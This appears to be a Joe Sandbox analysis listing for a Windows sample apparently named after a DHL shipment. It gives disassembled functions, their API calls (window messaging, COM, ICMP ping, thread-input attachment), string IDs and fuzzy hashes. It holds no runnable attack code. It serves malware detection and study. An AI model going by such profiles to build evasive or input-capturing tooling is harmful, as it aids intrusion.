                                                                                    Function 00836F23 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00836FA5
                                                                                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00836FA8
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00836FCC
                                                                                    • _memset.LIBCMT ref: 00836FDD
                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00836FEF
                                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00837067
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$LongWindow_memset
                                                                                    • String ID:
                                                                                    • API String ID: 830647256-0
                                                                                    • Opcode ID: 0c6544d87a47fb5a15904c619918ac133f4c5679d82ae97145270f2af6b6a7ab
                                                                                    • Instruction ID: c581ab6778ed99a13c9313f01ba083dc33d31dda0b10ee7be7ca96cfdc69b5cd
                                                                                    • Opcode Fuzzy Hash: 0c6544d87a47fb5a15904c619918ac133f4c5679d82ae97145270f2af6b6a7ab
                                                                                    • Instruction Fuzzy Hash: 13617AB1900208AFDB21DFA8CC81EEE77B8FB49710F144169FA14EB2A1D775AD41CB90
                                                                                    Function 00806B98 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00806BBF
                                                                                    • SafeArrayAllocData.OLEAUT32(?), ref: 00806C18
                                                                                    • VariantInit.OLEAUT32(?), ref: 00806C2A
                                                                                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 00806C4A
                                                                                    • VariantCopy.OLEAUT32(?,?), ref: 00806C9D
                                                                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 00806CB1
                                                                                    • VariantClear.OLEAUT32(?), ref: 00806CC6
                                                                                    • SafeArrayDestroyData.OLEAUT32(?), ref: 00806CD3
                                                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00806CDC
                                                                                    • VariantClear.OLEAUT32(?), ref: 00806CEE
                                                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00806CF9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                    • String ID:
                                                                                    • API String ID: 2706829360-0
                                                                                    • Opcode ID: c50775a5ff6e0557be44a400ec5d05b8c4b0603a0545862adba37ab6d66671a2
                                                                                    • Instruction ID: 6341c20330aaf9a5791b74e00ca2f2577e33835509c6750f07be55bd122ba3d7
                                                                                    • Opcode Fuzzy Hash: c50775a5ff6e0557be44a400ec5d05b8c4b0603a0545862adba37ab6d66671a2
                                                                                    • Instruction Fuzzy Hash: 54418071E00219EFDF10DF68DC489AEBBB9FF48314F008469EA55E7261DB30A955CBA0
                                                                                    Function 008283BB Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 007B9837: __itow.LIBCMT ref: 007B9862
                                                                                      • Part of subcall function 007B9837: __swprintf.LIBCMT ref: 007B98AC
                                                                                    • CoInitialize.OLE32 ref: 00828403
                                                                                    • CoUninitialize.OLE32 ref: 0082840E
                                                                                    • CoCreateInstance.OLE32(?,00000000,00000017,00842BEC,?), ref: 0082846E
                                                                                    • IIDFromString.OLE32(?,?), ref: 008284E1
                                                                                    • VariantInit.OLEAUT32(?), ref: 0082857B
                                                                                    • VariantClear.OLEAUT32(?), ref: 008285DC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                    • API String ID: 834269672-1287834457
                                                                                    • Opcode ID: e1c4c8b6d2959a4b9aadc1086b1e3de201ded800c9f102550c179399571c0ab5
                                                                                    • Instruction ID: 861e8d808de60269b524a287a94ace921f29d1afa67cd5096d77363036879b8e
                                                                                    • Opcode Fuzzy Hash: e1c4c8b6d2959a4b9aadc1086b1e3de201ded800c9f102550c179399571c0ab5
                                                                                    • Instruction Fuzzy Hash: 67616A70609322DFCB10EF14E948B5AB7E8FF49754F004919FA95DB291CB74E984CB92
                                                                                    Function 00825732 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • WSAStartup.WSOCK32(00000101,?), ref: 00825793
                                                                                    • inet_addr.WSOCK32(?,?,?), ref: 008257D8
                                                                                    • gethostbyname.WSOCK32(?), ref: 008257E4
                                                                                    • IcmpCreateFile.IPHLPAPI ref: 008257F2
                                                                                    • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00825862
                                                                                    • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00825878
                                                                                    • IcmpCloseHandle.IPHLPAPI(00000000), ref: 008258ED
                                                                                    • WSACleanup.WSOCK32 ref: 008258F3
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                    • String ID: Ping
                                                                                    • API String ID: 1028309954-2246546115
                                                                                    • Opcode ID: 4a0cc0e6e11f2c6f0266bdbcc1d0a27010987c9e84134494afd2d74a0ae06763
                                                                                    • Instruction ID: 40235ca88ef8688f543159d0f8ac04e06b02d13758b1253b28cf67c766145168
                                                                                    • Opcode Fuzzy Hash: 4a0cc0e6e11f2c6f0266bdbcc1d0a27010987c9e84134494afd2d74a0ae06763
                                                                                    • Instruction Fuzzy Hash: 14518D71644710DFDB10AF24EC49B6ABBE4FF48720F044929FA56DB2A1DB74E940DB82
                                                                                    Function 0081B4C3 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0081B4D0
                                                                                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0081B546
                                                                                    • GetLastError.KERNEL32 ref: 0081B550
                                                                                    • SetErrorMode.KERNEL32(00000000,READY), ref: 0081B5BD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Error$Mode$DiskFreeLastSpace
                                                                                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                    • API String ID: 4194297153-14809454
                                                                                    • Opcode ID: d7c39de9439acef6e4feeed7b328818c989e9a865cc67ab5ca05d1cdb96709b3
                                                                                    • Instruction ID: 33b5b50d69a1360270a45f1fe5603262edc94ff02ec8a9dfba27d9f0517c9738
                                                                                    • Opcode Fuzzy Hash: d7c39de9439acef6e4feeed7b328818c989e9a865cc67ab5ca05d1cdb96709b3
                                                                                    • Instruction Fuzzy Hash: FF318175A00209DFCB10EF68C845FEEBBB9FF45314F144125E616DB291DB749A82CB91
                                                                                    Function 00808F8F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 007B7DE1: _memmove.LIBCMT ref: 007B7E22
                                                                                      • Part of subcall function 0080AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0080AABC
                                                                                    • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00809014
                                                                                    • GetDlgCtrlID.USER32 ref: 0080901F
                                                                                    • GetParent.USER32 ref: 0080903B
                                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 0080903E
                                                                                    • GetDlgCtrlID.USER32(?), ref: 00809047
                                                                                    • GetParent.USER32(?), ref: 00809063
                                                                                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 00809066
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                    • String ID: ComboBox$ListBox
                                                                                    • API String ID: 1536045017-1403004172
                                                                                    • Opcode ID: c53abfded54807932386937dcffaf582068d7ca8863484b7de4484d616e43454
                                                                                    • Instruction ID: 6e94d49ad958abeaab51b2fd05e2d3aba2d35b56149a43cc2f15a810c5fca484
                                                                                    • Opcode Fuzzy Hash: c53abfded54807932386937dcffaf582068d7ca8863484b7de4484d616e43454
                                                                                    • Instruction Fuzzy Hash: B2219274E00208BBDF05ABA4CC89EFEBB75FF95310F100159F961972E2EB795815DA60
                                                                                    Function 0080907A Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 007B7DE1: _memmove.LIBCMT ref: 007B7E22
                                                                                      • Part of subcall function 0080AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0080AABC
                                                                                    • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 008090FD
                                                                                    • GetDlgCtrlID.USER32 ref: 00809108
                                                                                    • GetParent.USER32 ref: 00809124
                                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00809127
                                                                                    • GetDlgCtrlID.USER32(?), ref: 00809130
                                                                                    • GetParent.USER32(?), ref: 0080914C
                                                                                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 0080914F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                    • String ID: ComboBox$ListBox
                                                                                    • API String ID: 1536045017-1403004172
                                                                                    • Opcode ID: b2a6fbae44ef8b49ec44f8b1e944d0268fca0b3fc170fcca095cb2575cb96321
                                                                                    • Instruction ID: 955427f0e0279a101bcb6c2e6ac9140086fd38afbb5f4a63378dd9bb375a2b47
                                                                                    • Opcode Fuzzy Hash: b2a6fbae44ef8b49ec44f8b1e944d0268fca0b3fc170fcca095cb2575cb96321
                                                                                    • Instruction Fuzzy Hash: 3D21A174A00208FBDF05ABA4CC89EFEBB64FF94300F104015FA51972E2EB795815DB60
                                                                                    Function 00809163 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetParent.USER32 ref: 0080916F
                                                                                    • GetClassNameW.USER32(00000000,?,00000100), ref: 00809184
                                                                                    • _wcscmp.LIBCMT ref: 00809196
                                                                                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00809211
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: ClassMessageNameParentSend_wcscmp
                                                                                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                    • API String ID: 1704125052-3381328864
                                                                                    • Opcode ID: ef1514106d5b8438f0aa84399dccbe7d3da08c45d7b1a3343d877d354bbac0a5
                                                                                    • Instruction ID: 57cbc06610ebc6d8e65c0aff3ff8a5bf85ea9955f75fd93a15c408ac4ac4c833
                                                                                    • Opcode Fuzzy Hash: ef1514106d5b8438f0aa84399dccbe7d3da08c45d7b1a3343d877d354bbac0a5
                                                                                    • Instruction Fuzzy Hash: EC110A36248307B9FB152624DC0FDA73B9CFB25724B200026FA20E41D3FE6A585255D4
                                                                                    Function 008288AB Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • VariantInit.OLEAUT32(?), ref: 008288D7
                                                                                    • CoInitialize.OLE32(00000000), ref: 00828904
                                                                                    • CoUninitialize.OLE32 ref: 0082890E
                                                                                    • GetRunningObjectTable.OLE32(00000000,?), ref: 00828A0E
                                                                                    • SetErrorMode.KERNEL32(00000001,00000029), ref: 00828B3B
                                                                                    • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00842C0C), ref: 00828B6F
                                                                                    • CoGetObject.OLE32(?,00000000,00842C0C,?), ref: 00828B92
                                                                                    • SetErrorMode.KERNEL32(00000000), ref: 00828BA5
                                                                                    • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00828C25
                                                                                    • VariantClear.OLEAUT32(?), ref: 00828C35
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                    • String ID:
                                                                                    • API String ID: 2395222682-0
                                                                                    • Opcode ID: 7b1498ab03e24fe9ff668c745153fbbb545c9d9c48d8b4188192fa73f5c8bd31
                                                                                    • Instruction ID: eae66e0126d3e8708e93b8ad825ad3420535a68de3cd6ff93c6d6e9500cfc9ff
                                                                                    • Opcode Fuzzy Hash: 7b1498ab03e24fe9ff668c745153fbbb545c9d9c48d8b4188192fa73f5c8bd31
                                                                                    • Instruction Fuzzy Hash: B9C112B1608215EFCB00DF68D88496AB7E9FF88348F00491DF99ADB251DB71ED45CB52
                                                                                    Function 00817990 Relevance: 15.3, APIs: 10, Instructions: 292COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00817A6C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: ArraySafeVartype
                                                                                    • String ID:
                                                                                    • API String ID: 1725837607-0
                                                                                    • Opcode ID: 51f3d562e73f0a6185f6f5bf65e4ce0c433fcb74346d7afa5bd896edf200ed83
                                                                                    • Instruction ID: e99a3ac9bc4c1b74910a144dc64c032ec258911e3aae24e07b92f8d26b2b125f
                                                                                    • Opcode Fuzzy Hash: 51f3d562e73f0a6185f6f5bf65e4ce0c433fcb74346d7afa5bd896edf200ed83
                                                                                    • Instruction Fuzzy Hash: 49B18E7190821A9FDB10DFA8D884BFEBBB9FF49325F204429E601E7241D734A981CBD1
                                                                                    Function 008111CE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 008111F0
                                                                                    • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00810268,?,00000001), ref: 00811204
                                                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 0081120B
                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00810268,?,00000001), ref: 0081121A
                                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 0081122C
                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00810268,?,00000001), ref: 00811245
                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00810268,?,00000001), ref: 00811257
                                                                                    • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00810268,?,00000001), ref: 0081129C
                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00810268,?,00000001), ref: 008112B1
                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00810268,?,00000001), ref: 008112BC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                    • String ID:
                                                                                    • API String ID: 2156557900-0
                                                                                    • Opcode ID: a7a615c7f3cb288d83620586a9de891237960a58c64f5ebd8d79c7a01905608f
                                                                                    • Instruction ID: 65688de342c8debbeafe34949983887eb272e82eaf6e703c7658dd730faa1779
                                                                                    • Opcode Fuzzy Hash: a7a615c7f3cb288d83620586a9de891237960a58c64f5ebd8d79c7a01905608f
                                                                                    • Instruction Fuzzy Hash: CB316775A00604ABDF20DB54EC8DFA977ADFFA5311F104125FA19C72A1EBB49DC08BA4
                                                                                    Function 007BFA5D Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 007BFAA6
                                                                                    • OleUninitialize.OLE32(?,00000000), ref: 007BFB45
                                                                                    • UnregisterHotKey.USER32(?), ref: 007BFC9C
                                                                                    • DestroyWindow.USER32(?), ref: 007F45D6
                                                                                    • FreeLibrary.KERNEL32(?), ref: 007F463B
                                                                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 007F4668
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                    • String ID: close all
                                                                                    • API String ID: 469580280-3243417748
                                                                                    • Opcode ID: 4b453b640b99da14b9ec7ac11d9efff6ef4531db28f9ff4a80b0bbaa85a60f3c
                                                                                    • Instruction ID: a1c95a5e919e69fa6079811b236e5913ffe13c5ab12f231d53bbb8e5e345eb5c
                                                                                    • Opcode Fuzzy Hash: 4b453b640b99da14b9ec7ac11d9efff6ef4531db28f9ff4a80b0bbaa85a60f3c
                                                                                    • Instruction Fuzzy Hash: 4FA16F70701116CFCB18EF14C999BBAF764BF05710F1442ADE90AAB262DB38AD56CF91
                                                                                    Function 0080A068 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • EnumChildWindows.USER32(?,0080A439), ref: 0080A377
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: ChildEnumWindows
                                                                                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                    • API String ID: 3555792229-1603158881
                                                                                    • Opcode ID: 2a299c5d22358a86723723a28f708767e06c3ce8fc83233cae5ae5a55f5596c2
                                                                                    • Instruction ID: b142b6bc6877911e38b45343929c08763aed8ee5aebf093d5369153794743b84
                                                                                    • Opcode Fuzzy Hash: 2a299c5d22358a86723723a28f708767e06c3ce8fc83233cae5ae5a55f5596c2
                                                                                    • Instruction Fuzzy Hash: 5991B130600605EACB4CDFA0C846BEEFBB4FF44304F55812AD95AE7281DB356999CBE1
                                                                                    Function 007B2E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetWindowLongW.USER32(?,000000EB), ref: 007B2EAE
                                                                                      • Part of subcall function 007B1DB3: GetClientRect.USER32(?,?), ref: 007B1DDC
                                                                                      • Part of subcall function 007B1DB3: GetWindowRect.USER32(?,?), ref: 007B1E1D
                                                                                      • Part of subcall function 007B1DB3: ScreenToClient.USER32(?,?), ref: 007B1E45
                                                                                    • GetDC.USER32 ref: 007ECD32
                                                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 007ECD45
                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 007ECD53
